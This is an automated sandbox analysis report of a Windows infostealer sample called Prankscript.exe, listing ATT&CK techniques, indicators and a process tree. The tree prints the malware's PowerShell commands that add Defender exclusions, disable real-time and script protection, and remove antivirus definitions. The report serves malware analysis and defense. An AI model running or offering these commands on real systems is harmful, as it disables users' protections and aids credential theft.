bb74eeb349b280b04f90e7437f77eb53cfe209d7e4093c3ad093fc0be9817b3b

Resubmissions

22/03/2025, 04:07

250322-ep14rsxxaw 10

22/03/2025, 04:03

250322-emsplsxwhx 10

17/03/2025, 20:33

250317-zb8a5s1nz7 10

10/11/2024, 04:24

241110-e1n9casnhq 10

Analysis

max time kernel
109s
max time network
111s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
22/03/2025, 04:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Prankscript.exe
Size

69.0MB
MD5

2e5ec8b0a8af16b1d042367a86981938
SHA1

ecbacf37eefdf1154aef164b81b4242c96f13777
SHA256

bb74eeb349b280b04f90e7437f77eb53cfe209d7e4093c3ad093fc0be9817b3b
SHA512

fdacab5917ec8d3796f7382ca19fb932eb4f40ea07614229a7bfc57cfeacbb24c930b2857a59ccfb0a790e74cf465b009cefaf06fb17f9a250380871dc3f679f
SSDEEP

196608:bWfQecp8urErvI9pWjgN3ZdahF0pbH1AYfTRtQPCsZp/AA81s:Pp8urEUWjqeWxRR6zppas

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3464	powershell.exe
1680	powershell.exe
3124	powershell.exe
1832	powershell.exe
4148	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2824	cmd.exe
4852	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
3264	bound.exe
1996	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe
4848	Prankscript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2148	tasklist.exe
3756	tasklist.exe
1528	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1908	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002b0a3-22.dat	upx
behavioral1/memory/4848-26-0x00007FFABF790000-0x00007FFABFE54000-memory.dmp	upx
behavioral1/files/0x001c00000002b08f-28.dat	upx
behavioral1/memory/4848-31-0x00007FFAD1120000-0x00007FFAD1145000-memory.dmp	upx
behavioral1/files/0x001900000002b09a-49.dat	upx
behavioral1/memory/4848-50-0x00007FFAD4720000-0x00007FFAD472F000-memory.dmp	upx
behavioral1/files/0x004600000002b097-48.dat	upx
behavioral1/files/0x001900000002b096-47.dat	upx
behavioral1/files/0x001c00000002b095-46.dat	upx
behavioral1/files/0x001900000002b094-45.dat	upx
behavioral1/files/0x001900000002b091-44.dat	upx
behavioral1/files/0x001900000002b090-43.dat	upx
behavioral1/files/0x001900000002b08e-42.dat	upx
behavioral1/files/0x001900000002b0ac-41.dat	upx
behavioral1/files/0x001900000002b0a9-40.dat	upx
behavioral1/files/0x001900000002b0a8-39.dat	upx
behavioral1/files/0x001900000002b0a2-36.dat	upx
behavioral1/files/0x001900000002b0a0-35.dat	upx
behavioral1/files/0x001c00000002b0a1-32.dat	upx
behavioral1/memory/4848-56-0x00007FFAD1410000-0x00007FFAD143D000-memory.dmp	upx
behavioral1/memory/4848-58-0x00007FFAD1E40000-0x00007FFAD1E5A000-memory.dmp	upx
behavioral1/memory/4848-60-0x00007FFAD10F0000-0x00007FFAD1114000-memory.dmp	upx
behavioral1/memory/4848-62-0x00007FFAD0560000-0x00007FFAD06DF000-memory.dmp	upx
behavioral1/memory/4848-64-0x00007FFAD0540000-0x00007FFAD0559000-memory.dmp	upx
behavioral1/memory/4848-66-0x00007FFAD2720000-0x00007FFAD272D000-memory.dmp	upx
behavioral1/memory/4848-68-0x00007FFAD0500000-0x00007FFAD0533000-memory.dmp	upx
behavioral1/memory/4848-73-0x00007FFACDD40000-0x00007FFACDE0D000-memory.dmp	upx
behavioral1/memory/4848-76-0x00007FFAD1120000-0x00007FFAD1145000-memory.dmp	upx
behavioral1/memory/4848-75-0x00007FFABF260000-0x00007FFABF789000-memory.dmp	upx
behavioral1/memory/4848-84-0x00007FFACD360000-0x00007FFACD47B000-memory.dmp	upx
behavioral1/memory/4848-83-0x00007FFAD1E40000-0x00007FFAD1E5A000-memory.dmp	upx
behavioral1/memory/4848-80-0x00007FFAD2700000-0x00007FFAD270D000-memory.dmp	upx
behavioral1/memory/4848-78-0x00007FFAD04E0000-0x00007FFAD04F4000-memory.dmp	upx
behavioral1/memory/4848-72-0x00007FFABF790000-0x00007FFABFE54000-memory.dmp	upx
behavioral1/memory/4848-98-0x00007FFAD10F0000-0x00007FFAD1114000-memory.dmp	upx
behavioral1/memory/4848-222-0x00007FFAD0560000-0x00007FFAD06DF000-memory.dmp	upx
behavioral1/memory/4848-328-0x00007FFAD0500000-0x00007FFAD0533000-memory.dmp	upx
behavioral1/memory/4848-330-0x00007FFACDD40000-0x00007FFACDE0D000-memory.dmp	upx
behavioral1/memory/4848-340-0x00007FFABF260000-0x00007FFABF789000-memory.dmp	upx
behavioral1/memory/4848-357-0x00007FFAD0560000-0x00007FFAD06DF000-memory.dmp	upx
behavioral1/memory/4848-352-0x00007FFAD1120000-0x00007FFAD1145000-memory.dmp	upx
behavioral1/memory/4848-351-0x00007FFABF790000-0x00007FFABFE54000-memory.dmp	upx
behavioral1/memory/4848-366-0x00007FFABF790000-0x00007FFABFE54000-memory.dmp	upx
behavioral1/memory/4848-391-0x00007FFACDD40000-0x00007FFACDE0D000-memory.dmp	upx
behavioral1/memory/4848-390-0x00007FFAD0500000-0x00007FFAD0533000-memory.dmp	upx
behavioral1/memory/4848-389-0x00007FFAD2720000-0x00007FFAD272D000-memory.dmp	upx
behavioral1/memory/4848-388-0x00007FFAD0540000-0x00007FFAD0559000-memory.dmp	upx
behavioral1/memory/4848-387-0x00007FFAD0560000-0x00007FFAD06DF000-memory.dmp	upx
behavioral1/memory/4848-386-0x00007FFAD10F0000-0x00007FFAD1114000-memory.dmp	upx
behavioral1/memory/4848-385-0x00007FFAD1E40000-0x00007FFAD1E5A000-memory.dmp	upx
behavioral1/memory/4848-384-0x00007FFAD1410000-0x00007FFAD143D000-memory.dmp	upx
behavioral1/memory/4848-383-0x00007FFAD4720000-0x00007FFAD472F000-memory.dmp	upx
behavioral1/memory/4848-382-0x00007FFAD1120000-0x00007FFAD1145000-memory.dmp	upx
behavioral1/memory/4848-381-0x00007FFABF260000-0x00007FFABF789000-memory.dmp	upx
behavioral1/memory/4848-380-0x00007FFACD360000-0x00007FFACD47B000-memory.dmp	upx
behavioral1/memory/4848-379-0x00007FFAD2700000-0x00007FFAD270D000-memory.dmp	upx
behavioral1/memory/4848-378-0x00007FFAD04E0000-0x00007FFAD04F4000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3152	cmd.exe
4608	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2104	cmd.exe
4724	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4528	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1780	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133870899608754775"	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1136229799-3442283115-138161576-1000\{078EFD28-598A-4005-B5B8-C331F778B0BA}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1136229799-3442283115-138161576-1000\{8B9BC697-16F2-4A2F-9DDF-BEDCB245F599}	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4608	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3464	powershell.exe
3464	powershell.exe
1680	powershell.exe
1680	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
4852	powershell.exe
4852	powershell.exe
1680	powershell.exe
4852	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
1832	powershell.exe
1832	powershell.exe
3956	powershell.exe
3956	powershell.exe
4148	powershell.exe
4148	powershell.exe
1220	powershell.exe
1220	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3416	msedge.exe
3416	msedge.exe
3416	msedge.exe
3416	msedge.exe
3416	msedge.exe
3416	msedge.exe
3416	msedge.exe
3416	msedge.exe
3416	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	2148	tasklist.exe
Token: SeDebugPrivilege	3756	tasklist.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeIncreaseQuotaPrivilege	2588	WMIC.exe
Token: SeSecurityPrivilege	2588	WMIC.exe
Token: SeTakeOwnershipPrivilege	2588	WMIC.exe
Token: SeLoadDriverPrivilege	2588	WMIC.exe
Token: SeSystemProfilePrivilege	2588	WMIC.exe
Token: SeSystemtimePrivilege	2588	WMIC.exe
Token: SeProfSingleProcessPrivilege	2588	WMIC.exe
Token: SeIncBasePriorityPrivilege	2588	WMIC.exe
Token: SeCreatePagefilePrivilege	2588	WMIC.exe
Token: SeBackupPrivilege	2588	WMIC.exe
Token: SeRestorePrivilege	2588	WMIC.exe
Token: SeShutdownPrivilege	2588	WMIC.exe
Token: SeDebugPrivilege	2588	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2588	WMIC.exe
Token: SeRemoteShutdownPrivilege	2588	WMIC.exe
Token: SeUndockPrivilege	2588	WMIC.exe
Token: SeManageVolumePrivilege	2588	WMIC.exe
Token: 33	2588	WMIC.exe
Token: 34	2588	WMIC.exe
Token: 35	2588	WMIC.exe
Token: 36	2588	WMIC.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeIncreaseQuotaPrivilege	2588	WMIC.exe
Token: SeSecurityPrivilege	2588	WMIC.exe
Token: SeTakeOwnershipPrivilege	2588	WMIC.exe
Token: SeLoadDriverPrivilege	2588	WMIC.exe
Token: SeSystemProfilePrivilege	2588	WMIC.exe
Token: SeSystemtimePrivilege	2588	WMIC.exe
Token: SeProfSingleProcessPrivilege	2588	WMIC.exe
Token: SeIncBasePriorityPrivilege	2588	WMIC.exe
Token: SeCreatePagefilePrivilege	2588	WMIC.exe
Token: SeBackupPrivilege	2588	WMIC.exe
Token: SeRestorePrivilege	2588	WMIC.exe
Token: SeShutdownPrivilege	2588	WMIC.exe
Token: SeDebugPrivilege	2588	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2588	WMIC.exe
Token: SeRemoteShutdownPrivilege	2588	WMIC.exe
Token: SeUndockPrivilege	2588	WMIC.exe
Token: SeManageVolumePrivilege	2588	WMIC.exe
Token: 33	2588	WMIC.exe
Token: 34	2588	WMIC.exe
Token: 35	2588	WMIC.exe
Token: 36	2588	WMIC.exe
Token: SeDebugPrivilege	1528	tasklist.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	3956	powershell.exe
Token: SeIncreaseQuotaPrivilege	3360	WMIC.exe
Token: SeSecurityPrivilege	3360	WMIC.exe
Token: SeTakeOwnershipPrivilege	3360	WMIC.exe
Token: SeLoadDriverPrivilege	3360	WMIC.exe
Token: SeSystemProfilePrivilege	3360	WMIC.exe
Token: SeSystemtimePrivilege	3360	WMIC.exe
Token: SeProfSingleProcessPrivilege	3360	WMIC.exe
Token: SeIncBasePriorityPrivilege	3360	WMIC.exe
Token: SeCreatePagefilePrivilege	3360	WMIC.exe
Token: SeBackupPrivilege	3360	WMIC.exe
Token: SeRestorePrivilege	3360	WMIC.exe
Token: SeShutdownPrivilege	3360	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3416	msedge.exe
3416	msedge.exe
3416	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4316 wrote to memory of 4848	4316	Prankscript.exe	80
PID 4316 wrote to memory of 4848	4316	Prankscript.exe	80
PID 4848 wrote to memory of 1032	4848	Prankscript.exe	82
PID 4848 wrote to memory of 1032	4848	Prankscript.exe	82
PID 4848 wrote to memory of 1996	4848	Prankscript.exe	83
PID 4848 wrote to memory of 1996	4848	Prankscript.exe	83
PID 4848 wrote to memory of 1856	4848	Prankscript.exe	85
PID 4848 wrote to memory of 1856	4848	Prankscript.exe	85
PID 4848 wrote to memory of 1116	4848	Prankscript.exe	87
PID 4848 wrote to memory of 1116	4848	Prankscript.exe	87
PID 4848 wrote to memory of 1908	4848	Prankscript.exe	89
PID 4848 wrote to memory of 1908	4848	Prankscript.exe	89
PID 1032 wrote to memory of 3464	1032	cmd.exe	92
PID 1032 wrote to memory of 3464	1032	cmd.exe	92
PID 4848 wrote to memory of 3084	4848	Prankscript.exe	93
PID 4848 wrote to memory of 3084	4848	Prankscript.exe	93
PID 4848 wrote to memory of 4640	4848	Prankscript.exe	94
PID 4848 wrote to memory of 4640	4848	Prankscript.exe	94
PID 3084 wrote to memory of 3756	3084	cmd.exe	97
PID 3084 wrote to memory of 3756	3084	cmd.exe	97
PID 4640 wrote to memory of 2148	4640	cmd.exe	98
PID 4640 wrote to memory of 2148	4640	cmd.exe	98
PID 4848 wrote to memory of 788	4848	Prankscript.exe	136
PID 4848 wrote to memory of 788	4848	Prankscript.exe	136
PID 4848 wrote to memory of 2824	4848	Prankscript.exe	100
PID 4848 wrote to memory of 2824	4848	Prankscript.exe	100
PID 1996 wrote to memory of 3124	1996	cmd.exe	103
PID 1996 wrote to memory of 3124	1996	cmd.exe	103
PID 1856 wrote to memory of 1680	1856	cmd.exe	104
PID 1856 wrote to memory of 1680	1856	cmd.exe	104
PID 4848 wrote to memory of 1476	4848	Prankscript.exe	101
PID 4848 wrote to memory of 1476	4848	Prankscript.exe	101
PID 1116 wrote to memory of 3264	1116	cmd.exe	107
PID 1116 wrote to memory of 3264	1116	cmd.exe	107
PID 1908 wrote to memory of 2836	1908	cmd.exe	106
PID 1908 wrote to memory of 2836	1908	cmd.exe	106
PID 4848 wrote to memory of 1732	4848	Prankscript.exe	108
PID 4848 wrote to memory of 1732	4848	Prankscript.exe	108
PID 788 wrote to memory of 2588	788	cmd.exe	112
PID 788 wrote to memory of 2588	788	cmd.exe	112
PID 4848 wrote to memory of 2104	4848	Prankscript.exe	113
PID 4848 wrote to memory of 2104	4848	Prankscript.exe	113
PID 4848 wrote to memory of 2996	4848	Prankscript.exe	114
PID 4848 wrote to memory of 2996	4848	Prankscript.exe	114
PID 4848 wrote to memory of 4700	4848	Prankscript.exe	117
PID 4848 wrote to memory of 4700	4848	Prankscript.exe	117
PID 3264 wrote to memory of 2516	3264	bound.exe	118
PID 3264 wrote to memory of 2516	3264	bound.exe	118
PID 1732 wrote to memory of 3932	1732	cmd.exe	130
PID 1732 wrote to memory of 3932	1732	cmd.exe	130
PID 2824 wrote to memory of 4852	2824	cmd.exe	121
PID 2824 wrote to memory of 4852	2824	cmd.exe	121
PID 1476 wrote to memory of 1528	1476	cmd.exe	122
PID 1476 wrote to memory of 1528	1476	cmd.exe	122
PID 2996 wrote to memory of 1780	2996	cmd.exe	124
PID 2996 wrote to memory of 1780	2996	cmd.exe	124
PID 2104 wrote to memory of 4724	2104	cmd.exe	123
PID 2104 wrote to memory of 4724	2104	cmd.exe	123
PID 4848 wrote to memory of 1588	4848	Prankscript.exe	125
PID 4848 wrote to memory of 1588	4848	Prankscript.exe	125
PID 4700 wrote to memory of 5020	4700	cmd.exe	126
PID 4700 wrote to memory of 5020	4700	cmd.exe	126
PID 1588 wrote to memory of 4360	1588	cmd.exe	128
PID 1588 wrote to memory of 4360	1588	cmd.exe	128

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2836	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
"C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4316
- C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
  "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3264
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\F983.tmp\F984.tmp\F985.vbs //Nologo
        5⤵
        
        PID:2516
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:4972
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=IQDWOHB_kpI
        6⤵
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:3416
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2dc,0x368,0x7ffabfc2f208,0x7ffabfc2f214,0x7ffabfc2f220
        7⤵
        
        PID:2684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:11
        7⤵
        
        PID:1724
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2112,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:2
        7⤵
        
        PID:4992
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1824,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=2872 /prefetch:13
        7⤵
        
        PID:1080
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
        7⤵
        
        PID:2068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3484,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
        7⤵
        
        PID:2540
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4024,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=4580 /prefetch:1
        7⤵
        
        PID:2336
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4036,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:9
        7⤵
        
        PID:2552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4060,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=4608 /prefetch:9
        7⤵
        
        PID:3284
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4052,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=4596 /prefetch:1
        7⤵
        
        PID:4348
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3724,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=3732 /prefetch:14
        7⤵
        
        PID:2228
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=4776,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=5360 /prefetch:1
        7⤵
        
        PID:4648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
